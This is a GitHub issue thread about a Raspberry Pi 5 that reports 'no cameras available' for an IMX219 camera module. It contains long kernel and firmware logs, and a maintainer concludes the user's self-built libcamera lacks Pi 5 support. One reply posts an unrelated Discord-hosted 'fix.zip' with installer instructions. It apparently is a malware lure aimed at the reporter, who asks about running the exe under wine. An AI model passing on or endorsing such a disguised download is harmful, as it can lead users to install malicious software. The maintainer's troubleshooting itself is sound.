raspberrypi/rpicam-apps #709: [BUG]

Baiken1412, 2024-09-03:
**Describe the bug**
My camera module 2 does not work anymore on my Pi 5. 
when I try rpicam-hello it will come up an error says no cameras available 

I tried sudo vclog -m and dmesg, the log told me that a camera was detected 
007117.437: Found camera 'imx219' on port 1, unicam_port 1
007185.673: Loaded overlay 'imx219'

**Bug report**
[bug-report.txt](https://github.com/user-attachments/files/16844303/bug-report.txt)

**Additional context**
### dmesg
kid@raspberrypi:~ $ dmesg
[    0.000000] Booting Linux on physical CPU 0x0000000000 [0x414fd0b1]
[    0.000000] Linux version 6.6.47-v8-16k+ (dom@buildbot) (aarch64-linux-gnu-gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #1794 SMP PREEMPT Thu Aug 29 16:30:28 BST 2024
[    0.000000] KASLR enabled
[    0.000000] random: crng init done
[    0.000000] Machine model: Raspberry Pi 5 Model B Rev 1.0
[    0.000000] efi: UEFI not found.
[    0.000000] Reserved memory: created CMA memory pool at 0x0000000002000000, size 320 MiB
[    0.000000] OF: reserved mem: initialized node linux,cma, compatible id shared-dma-pool
[    0.000000] OF: reserved mem: 0x0000000002000000..0x0000000015ffffff (327680 KiB) map reusable linux,cma
[    0.000000] OF: reserved mem: 0x0000000000000000..0x000000000007ffff (512 KiB) nomap non-reusable atf@0
[    0.000000] OF: reserved mem: 0x000000003fd165e0..0x000000003fd16617 (0 KiB) nomap non-reusable nvram@0
[    0.000000] Zone ranges:
[    0.000000]   DMA      [mem 0x0000000000000000-0x00000000ffffffff]
[    0.000000]   DMA32    empty
[    0.000000]   Normal   [mem 0x0000000100000000-0x00000001ffffffff]
[    0.000000] Movable zone start for each node
[    0.000000] Early memory node ranges
[    0.000000]   node   0: [mem 0x0000000000000000-0x000000000007ffff]
[    0.000000]   node   0: [mem 0x0000000000080000-0x000000003f7fffff]
[    0.000000]   node   0: [mem 0x0000000040000000-0x00000001ffffffff]
[    0.000000] Initmem setup node 0 [mem 0x0000000000000000-0x00000001ffffffff]
[    0.000000] On node 0, zone DMA: 512 pages in unavailable ranges
[    0.000000] psci: probing for conduit method from DT.
[    0.000000] psci: PSCIv1.1 detected in firmware.
[    0.000000] psci: Using standard PSCI v0.2 function IDs
[    0.000000] psci: MIGRATE_INFO_TYPE not supported.
[    0.000000] psci: SMC Calling Convention v1.2
[    0.000000] percpu: Embedded 14 pages/cpu s183976 r8192 d37208 u229376
[    0.000000] pcpu-alloc: s183976 r8192 d37208 u229376 alloc=14*16384
[    0.000000] pcpu-alloc: [0] 0 [0] 1 [0] 2 [0] 3 
[    0.000000] Detected PIPT I-cache on CPU0
[    0.000000] CPU features: detected: Virtualization Host Extensions
[    0.000000] CPU features: detected: Hardware dirty bit management
[    0.000000] CPU features: detected: Spectre-v4
[    0.000000] CPU features: detected: Spectre-BHB
[    0.000000] CPU features: kernel page table isolation forced ON by KASLR
[    0.000000] CPU features: detected: Kernel page table isolation (KPTI)
[    0.000000] CPU features: detected: SSBS not fully self-synchronizing
[    0.000000] alternatives: applying boot alternatives
[    0.000000] Kernel command line: reboot=w coherent_pool=1M 8250.nr_uarts=1 pci=pcie_bus_safe  smsc95xx.macaddr=2C:CF:67:70:A7:71 vc_mem.mem_base=0x3fc00000 vc_mem.mem_size=0x40000000  console=ttyAMA10,115200 console=tty1 root=PARTUUID=a2608f4a-02 rootfstype=ext4 fsck.repair=yes rootwait quiet splash plymouth.ignore-serial-consoles cfg80211.ieee80211_regdom=AU
[    0.000000] Unknown kernel command line parameters "splash", will be passed to user space.
[    0.000000] Dentry cache hash table entries: 1048576 (order: 9, 8388608 bytes, linear)
[    0.000000] Inode-cache hash table entries: 524288 (order: 8, 4194304 bytes, linear)
[    0.000000] Built 1 zonelists, mobility grouping on.  Total pages: 521728
[    0.000000] mem auto-init: stack:off, heap alloc:off, heap free:off
[    0.000000] software IO TLB: area num 4.
[    0.000000] software IO TLB: mapped [mem 0x00000000fbffc000-0x00000000ffffc000] (64MB)
[    0.000000] Memory: 7891600K/8380416K available (13376K kernel code, 2224K rwdata, 4288K rodata, 5056K init, 1213K bss, 161136K reserved, 327680K cma-reserved)
[    0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=4, Nodes=1
[    0.000000] ftrace: allocating 43309 entries in 43 pages
[    0.000000] ftrace: allocated 43 pages with 4 groups
[    0.000000] trace event string verifier disabled
[    0.000000] rcu: Preemptible hierarchical RCU implementation.
[    0.000000] rcu: 	RCU event tracing is enabled.
[    0.000000] rcu: 	RCU restricting CPUs from NR_CPUS=256 to nr_cpu_ids=4.
[    0.000000] 	Trampoline variant of Tasks RCU enabled.
[... 552 lines cut ...]
006194.502: 02034b7123090707830100004d010304
006194.511: 10121f202261605f5e5d6d030c002000
006194.520: b83c20006001020367d85dc401788003
006194.529: e30f0003e2006ae305c000e606050160
006194.538: 6050681a00000101283c00565e00a0a0
006194.547: a0295030203500b9882100001a1a3680
006194.556: a070381f402a263500b9882100001a00
006194.565: 00000000000000000000000000000003
006194.592: HDMI0: best-mode 2 (limit 2) 1920x1080 60 Hz CEA modes 1a00058005000000000000e003000000 extensions 1
006194.605: Select resolution HDMI1/2 hotplug 0 max_mode 2
006194.645: FB0 disp 0 max-fb 2 1920x1080 stride 3840 base 0x3f800000
007035.206: dtb_file 'bcm2712-rpi-5-b.dtb'
007117.437: Found camera 'imx219' on port 1, unicam_port 1
007185.673: Loaded overlay 'imx219'
007284.648: dtparam: audio=on
007289.137: Unknown dtparam 'audio' - ignored
007344.858: Loaded overlay 'vc4-kms-v3d-pi5'
007455.116: Loaded overlay 'w1-gpio-pi5'
010572.044: Starting OS 10572 ms
010574.676: 00000040: -> 00000480
010574.691: 00000030: -> 00100080
010574.707: 00000034: -> 00100080
010574.722: 00000038: -> 00100080
010574.738: 0000003c: -> 00100080
010676.778: sdram: sdram refresh 2081->4162 (2)

maher-nakesh, 2024-09-03:
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

Baiken1412, 2024-09-03:
> try this https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& select the desired compiler in the installer
Do I use wine to run the exe file on my pi os?

naushir, 2024-09-03:
Can you provide the output of ``LIBCAMERA_LOG_LEVELS=*:0 rpicam-hello`` please?

Baiken1412, 2024-09-03:
kid@raspberrypi:~ $ LIBCAMERA_LOG_LEVELS=*:0 rpicam-hello
[0:00:56.894574501] [2601] DEBUG IPAModule ipa_module.cpp:334 ipa_rkisp1.so: IPA module /usr/local/lib/aarch64-linux-gnu/libcamera/ipa_rkisp1.so is signed
[0:00:56.894708131] [2601] DEBUG IPAManager ipa_manager.cpp:235 Loaded IPA module '/usr/local/lib/aarch64-linux-gnu/libcamera/ipa_rkisp1.so'
[0:00:56.895798575] [2601] DEBUG IPAModule ipa_module.cpp:334 ipa_rpi_vc4.so: IPA module /usr/local/lib/aarch64-linux-gnu/libcamera/ipa_rpi_vc4.so is signed
[0:00:56.895835334] [2601] DEBUG IPAManager ipa_manager.cpp:235 Loaded IPA module '/usr/local/lib/aarch64-linux-gnu/libcamera/ipa_rpi_vc4.so'
[0:00:56.895942001] [2601] DEBUG IPAModule ipa_module.cpp:334 ipa_soft_simple.so: IPA module /usr/local/lib/aarch64-linux-gnu/libcamera/ipa_soft_simple.so is signed
[0:00:56.895957779] [2601] DEBUG IPAManager ipa_manager.cpp:235 Loaded IPA module '/usr/local/lib/aarch64-linux-gnu/libcamera/ipa_soft_simple.so'
[0:00:56.896092057] [2601]  INFO Camera camera_manager.cpp:325 libcamera v0.3.1+94-7a36d057
[0:00:56.896236631] [2603] DEBUG Camera camera_manager.cpp:73 Starting camera manager
[0:00:56.896696075] [2603] DEBUG DeviceEnumerator device_enumerator.cpp:230 New media device "pispbe" created from /dev/media2
[0:00:56.896902334] [2603] DEBUG DeviceEnumerator device_enumerator.cpp:258 Added device /dev/media2: pispbe
[0:00:56.897107594] [2603] DEBUG DeviceEnumerator device_enumerator.cpp:230 New media device "rp1-cfe" created from /dev/media0
[0:00:56.897270908] [2603] DEBUG DeviceEnumerator device_enumerator.cpp:258 Added device /dev/media0: rp1-cfe
[0:00:56.897327834] [2603] DEBUG DeviceEnumerator device_enumerator.cpp:230 New media device "rpivid" created from /dev/media3
[0:00:56.897363871] [2603] DEBUG DeviceEnumerator device_enumerator.cpp:258 Added device /dev/media3: rpivid
[0:00:56.897442334] [2603] DEBUG DeviceEnumerator device_enumerator.cpp:230 New media device "pispbe" created from /dev/media1
[0:00:56.897553334] [2603] DEBUG DeviceEnumerator device_enumerator.cpp:258 Added device /dev/media1: pispbe
[0:00:56.897577131] [2603] DEBUG Camera camera_manager.cpp:138 Found registered pipeline handler 'imx8-isi'
[0:00:56.897841557] [2603] DEBUG Camera camera_manager.cpp:138 Found registered pipeline handler 'mali-c55'
[0:00:56.897912316] [2603] DEBUG Camera camera_manager.cpp:138 Found registered pipeline handler 'rkisp1'
[0:00:56.898007612] [2603] DEBUG Camera camera_manager.cpp:138 Found registered pipeline handler 'rpi/vc4'
[0:00:56.898051742] [2603] DEBUG RPI vc4.cpp:178 Unable to acquire a Unicam instance
[0:00:56.898058519] [2603] DEBUG RPI vc4.cpp:178 Unable to acquire a Unicam instance
[0:00:56.898067538] [2603] DEBUG Camera camera_manager.cpp:138 Found registered pipeline handler 'simple'
[0:00:56.898123853] [2603] DEBUG Camera camera_manager.cpp:138 Found registered pipeline handler 'uvcvideo'
Made X/EGL preview window
ERROR: *** no cameras available ***

naushir, 2024-09-03:
Your libcamera installation does not have Pi 5 support.  Did you build libcamera yourself?  If so, which tree/repo did you use?

Baiken1412, 2024-09-03:
sorry I couldn't rememeber, I did build it myself

naushir, 2024-09-03:
You will need to build libcamera from the following repo: https://github.com/raspberrypi/libcamera and following the exact instructions in the README.md file for full Pi 5 support.

closed 2024-09-03 by naushir